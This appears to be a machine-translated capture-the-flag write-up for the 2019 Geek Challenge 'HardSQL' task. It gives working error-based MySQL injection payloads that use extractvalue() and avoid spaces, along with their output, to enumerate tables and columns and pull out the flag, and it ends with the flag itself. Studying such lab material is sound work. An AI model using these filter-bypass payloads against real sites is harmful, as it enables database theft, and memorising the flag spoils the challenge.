[geek challenge 2019] hardsql

[ Geek challenge 2019]HardSQL

Tried several common methods , Space found ,or,and,union,order by Many are filtered .

Try error reporting , If you haven't used it, you can directly check Baidu , Then use extractvalue() Function found not filtered out .

#  Blow up the current database 
?username=asdasdasda&password=2'-extractvalue(1,(concat(0x7e,(select(database())))))%23 #  Blasting data sheet  ?username=asdasdasda&password=2'-extractvalue(1,concat(0x7e,(select(group_concat(table_name))from(information_schema.tables)where((table_schema)like('%geek%')))))%23 
## '~H4rDsq1'

#  Burst field 
?username=asdasdasda&password=2'-extractvalue(1,concat(0x7e,(select(group_concat(column_name))from(information_schema.columns)where((table_name)like('%H4rDsq1%')))))%23 ## '~id,username,password' #  Violent left 30 The value of a  ## extractvalue()  Function maximum return value  32  So you need to use  left()  perhaps  right()  function , Cut from the left or right , And then splicing . ?username=asdasdasda&password=2'-extractvalue(1,(concat(0x7e,(select(left(password,31))from(H4rDsq1)))))%23
## 'flag{4e949b07-99eb-4fec-ae1b-17'

#  The value on the right of the burst 
?username=asdasdasda&password=2'-extractvalue(1,(concat(0x7e,(select(right(password,15))from(H4rDsq1)))))%23 ## '~b-173bd90bdf56}' # ' Final flag：flag{
   4e949b07-99eb-4fec-ae1b-173bd90bdf56}'